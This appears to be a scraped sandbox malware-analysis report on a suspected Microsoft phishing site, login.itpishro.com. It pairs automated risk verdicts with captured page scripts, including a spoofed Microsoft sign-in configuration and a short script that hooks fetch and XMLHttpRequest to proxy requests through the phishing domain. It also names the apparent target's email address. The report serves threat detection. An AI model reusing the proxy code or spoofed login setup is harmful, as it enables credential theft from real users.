h<<i},e=d,f=1,g=1e3*eM[hk(1695)][hk(904)](e[hk(1746)](2,f),32),eM[hk(1738)](function(hl){hl=hk,eM[hl(525)]&&(eM[hl(1809)][hl(1626)](),eM[hl(1809)][hl(1839)](),eM[hl(637)]=!![],eM[e[hl(1274)]][hl(542)]({'source':e[hl(549)],'widgetId':eM[hl(1187)][hl(510)],'event':e[hl(796)],'cfChlOut':eM[hl(1187)][hl(1442)],'cfChlOutS':eM[hl(1187)][hl(1496)],'code':hl(1183),'rcV':eM[hl(1187)][hl(1332)]},'*'))},g)},eM[gJ(558)]=function(g,h,i,hm,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(hm=gJ,j={},j[hm(1168)]=function(G,H){return G+H},j[hm(1740)]=hm(1039),j[hm(1739)]=hm(921),j[hm(1424)]=function(G,H){return G instanceof H},j[hm(1690)]=hm(1002),j[hm(1669)]=function(G,H){return G||H},j[hm(965)]=hm(1052),j[hm(724)]=function(G,H){return G+H},j[hm(1328)]=function(G,H){return G+H},j[hm(653)]=function(G,H){return G+H},j[hm(1053)]=hm(1460),j[hm(1381)]=hm(1417),j[hm(1671)]=hm(629),j);try{if(l=fh(g[hm(1755)],g[hm(18 |
| URL: https://challenges.cloudflare.com/turnstile/v0/g/f... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://www.gstatic.com/recaptcha/releases/pPK749s... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a legitimate Google reCAPTCHA implementation, with no obvious malicious behaviors. It includes code related to analytics, telemetry, and DOM manipulation, but these are common practices for a reCAPTCHA widget. The code is also well-commented and licensed under the Apache 2.0 and MIT licenses, indicating it is likely part of a legitimate open-source project. Overall, this script poses a low risk and is likely used for its intended purpose of providing a reCAPTCHA challenge."
} |
(function(){/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
Copyright The Closure Library Authors.
SPDX-License-Identifier: MIT
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var T=function(){return[function(r,d,h,V,R,K,Y,S,N,D,F,E,l,B,C,m){return(r|32)==(((C=["fr","flat",2],r)-C[2]>>4||(m=new Promise(function(P){window.addEventListener("visibilitychange",P,{once:!0}),document.hidden||P()})),r-7>>4)||(E=[2654435761,0,"1"],Y.wb=K===void 0?!1:K,B=b[38](26,Y,V),N=g[16](55,B),Y[C[0]]=N.next().value,Y.C=N.next().value,Y.rI=N.next().value,Y.Zf=N.next().value,F=Y.R()[C[1]](Infinity),S=F.findIndex(function(P){return P instanceof dy&&k[17](15,P,h)==d}),l=g[9](5,F[S],lj,3,p[12](77)),
D=[n[48](22,Y[C[0]]),A[43](38,Y.rI,U[9](11,Y[C[0]]),E[0]),A[10](27,3,Y.rI,U[9](19,Y.rI),E[1]),A[10](28,3,Y.Zf,U[9](19,R),Y.bf),A[10](24,3,Y.Zf,U[9](35,Y.Zf),U[9](27,Y.rI)),T[11](20,T[26](64,h,l[h])),k[30](55,h,E[C[2]],F,Y,Y.Xa)],U[47](20,E[1],Y),m=D),r)&&(K=g[31](9,1,d,V+R,gy),Y=h.map(function(P,v){return K[v%K.length]}),m=p[30](28,0,Y,h)),m},function(r,d,h,V,R,K,Y,S,N){if(N=[75,"userAgent",46],(r&N[0])==r){a:{if(V=By.navigator)if(h=V[N[1]]){d=h;break a}d=""}S=d}if((r>>1&14)==((r|24)==r&&(p[48](18,
h.B),h.F=d),r-5&13||(V=e[48](10,d,h),S=V=="array"||V==d&&typeof h.length=="number"),2))a:{if(n[32](N[2])&&V!=="Silk"){if(!(Y=kG.brands.find(function(D){return D.brand===V}),Y)||!Y.version){S=NaN;break a}K=Y.version.split(".")}else{if((R=U[28](1,"OPR",h,d,"8.0",V),R)===""){S=NaN;break a}K=R.split(".")}S=K.length===0?NaN:Number(K[0])}return(r>>2&3)==3&&(Y=b[15](45,V,pZ(),h),S=function(D,F){return D=b[F=["concat",1,"reduce"],29](F[1],F[1],0,255,d+Y(),K),{rm:k[26](10,0,R[F[0]](D).map(function(E){return A[14](9,
0,E)})[F[2]](function(E,l){return E.xor(l)})),A0:D}}),S},function(r,d,h,V){return(r^25)<((r|(V=[37,28,27],5))>>4||(d=T[9](26,this.U),h=U[45](2,!1,V[1],this.U,d,!1)),V[0])&&r+4>=V[2]&&H.call(this,d),h},function(r,d,h,V,R,K){return(r+(R=[1,24,29],(r-2|7)<r&&(r-R[0]|55)>=r&&(K=sM(function(){return h().parent!=h()?!0:h().frameElement!=null?!0:!1},!0)),2)&R[2])>=r&&(r+5^28)<r&&(K=CZ(ij(d,h),V)),(r|32)==r&&H.call(this,d),(r|R[1])==r&&(K=function(Y,S,N,D,F,E,l,B,C){C=[5,"aO","push"],UM.length?(E=UM.pop(),
g[C[0]](4,E,S),e[8](63,void 0,S,void 0,Y,E.U),D=E):D=new vy(Y,S),F=D;try{l=new V,N=l[C[1]],p[18](25,null,h)(N,F),B=l}finally{F.U.clear(),F.J=-1,F.R=-1,UM.length<d&&UM[C[2]](F)}return B}),K},function(r,d,h,V,R,K,Y,S){if((S=["call",32,47],(r|1)&2)==2){K=["/m/04w67_",'<div class="',"TileSelectionStreetSign"],R=K[1]+p[40](S[2],"rc-imageselect-desc-no-canonical")+h;switch(A[18](56,V)?V.toString():V){case K[2]:R+="Tap the center of the <strong>street signs</strong>";break;case "/m/0k4j":R+="Tap the center of the <strong>cars</strong>";
break;case K[0]:R+="Tap the center of the <strong>mail boxes</strong>"}Y=$G(R+d)}if((r^30)>=20&&(r^25)<S[1])H[S[0]](this,d,0,"dresp");if((r|48)==r)H[S[0]](this,d);return Y},function(r,d,h,V,R,K,Y){if((r+5&7)==(((K=[1,2,"call"],r^7)&12)<5&&(r^32)>>4>=K[1]&&(Hy[K[2]](this,d),this.U=[[]],this.C=K[0]),K)[1]){R=[7,0,127],Wy(V);for(Wy(h);h>R[K[0]]||V>R[K[1]];)d.U.push(V&R[K[1]]|128),V=(V>>>R[0]|h<<25)>>>R[K[0]],h>>>=R[0];d.U.push(V)}if((r>>K[0]&11)==K[0])MB[K[2]](this,360,20);return Y},function(r,d,h,V,
R,K,Y,S,N){return((r|((r&46)==(r+5<(N=["J","U","hN"],23)&&(r^37)>=8&&(p[19](44,V),h=e[10](50,V,h),V[N[1]].has(h)&&(V.K=d,V[N[0]]-=V[N[1]].get(h).length,V[N[1]]["delete"](h))),r)&&(K=["n","waf",!0],R.B=Date.now(),X$=R.yM,R[N[0]]=U[32](32,R[N[1]])?new yx(R.yM,R.O,n[6](50,z1,R[N[1]])):new a9(R.yM,R.O),R[N[0]].R=A[27](4,9,R[N[2]]),p[41](2)?R[N[0]].u(n[9](83,"t",K[2],R),n[5](37,"-",R.id),!1):(R.K=p[19](76,0,K[2],V,R),V===1&&window.___grecaptcha_cfg[K[1]]&&window.___grecaptcha_cfg[K[1]].includes("session")&&
U[32](41,R[N[1]])&&e[34](41,5,K[0],R),U[32](33,R[ |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.itpishro.com |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of 'login' as a subdomain is a common tactic used in phishing to mimic legitimate login pages.", "The domain 'itpishro.com' could be a legitimate domain for another service, but it is not related to Microsoft, raising suspicion." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: unknown |
| URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code/URLs, and redirects to suspicious domains. While some contextual factors like the use of trusted domains and analytics-like functionality may suggest legitimate intent, the overall level of suspicious activity is high enough to warrant a medium-to-high risk assessment."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/","urlDefaultFavicon":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=lindsey.johnson%40yogiproducts.com\u0026client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.itpishro.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/sso?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/ssoprobe?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/iframe?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/common/winauth/sso/edgeredirect?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeAHmWHEMW-vD3BkpxtSxEkYV4xEctXcq0I8Eha9LYyVuAVQSKHWMoBv_iZTLpMxIBoXnYZCyf5eJb1VBHbqm3D9yfI8tYa8tKFy_Ha5Zmrii_fQ_clbBAPhSXght9KiyCAIJFt0jZAN6eMrTwJ56CFvvsLs9oPnz4ELeZipx7QkoCudp6cGuIre58Vck03oK_yOd8h2wkvgjj220v2UxykyAA","canary":"AnSAjKRrNOwQtr8z9kd3q69ESJf66oy4Cn0D7ohySpw=0:1:CANARY:UBGr7oDq0LxvpzKZqBfP6p7QR5W5O2ZkhwoqxtxJyjQ=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","sessionId":"b61181e2-84e9-42b4-9b06-beac63885d00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.itpishro.com/common/instrumentation/reportpageload","dssostatus":"https://login.itpishro.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://6161646 |
| URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It includes dynamic code manipulation, data exfiltration, and URL obfuscation, which are considered moderate-risk indicators. However, the script also appears to have some legitimate functionality, such as cookie handling and URL patching, which mitigates the overall risk. Further review may be necessary to determine the full context and intent of the script."
} |
(function(){
var getLocation = function(href) {
var l = document.createElement("a");
l.href = href;
return l;
};
function encoderSub(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
hex += ''+str.charCodeAt(i).toString(16);
}
return hex;
}
function setUrl(baseurl,host){
if(host.includes(baseurl)){
return host;
}
dash_url = encoderSub(host);
return dash_url + "." + baseurl;
}
function patch(url){
baseUrl = "itpishro.com";
urlparts = getLocation(url);
if(urlparts.hostname.includes(baseUrl)){
return url;
}
return url.replace("https://"+urlparts.hostname,location.protocol + "//"+setUrl(baseUrl,urlparts.hostname));
}
function getCookie(cname) {
let name = cname + "=";
let decodedCookie = decodeURIComponent(document.cookie);
let ca = decodedCookie.split(';');
for(let i = 0; i <ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
var pSend = window.XMLHttpRequest.prototype.send;
window.XMLHttpRequest.prototype.send = function() {
//add cookies
this.setRequestHeader("vfff9080", getCookie("vfff9080"));
return pSend.apply(this, [].slice.call(arguments));
};
const constantMock = window.fetch;
window.fetch = function() {
console.log(typeof arguments[0]);
if(typeof arguments[0] == "object"){
arguments[0] = new Request(patch(arguments[0].url),arguments[0]);
// console.log(arguments[0]);
}
else{
arguments[0] = patch(arguments[0]);
}
return new Promise((resolve, reject) => {
constantMock
.apply(this, arguments)
.then((response) => {
resolve(response);
})
.catch((error) => {
reject(response);
})
});
}
})();
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Success!",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script includes moderate-risk indicators such as aggressive DOM manipulation and error logging to potentially external sources. However, there are no high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, which reduces the risk score."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"lindsey.johnson@yogiproducts.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"lindsey.johnson@yogiproducts.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain for Microsoft.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of a login page on a non-Microsoft domain is suspicious.", "The email domain 'yogiproducts.com' does not match the brand 'Microsoft', which could indicate a phishing attempt." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: lindsey.johnson@yogiproducts.com |
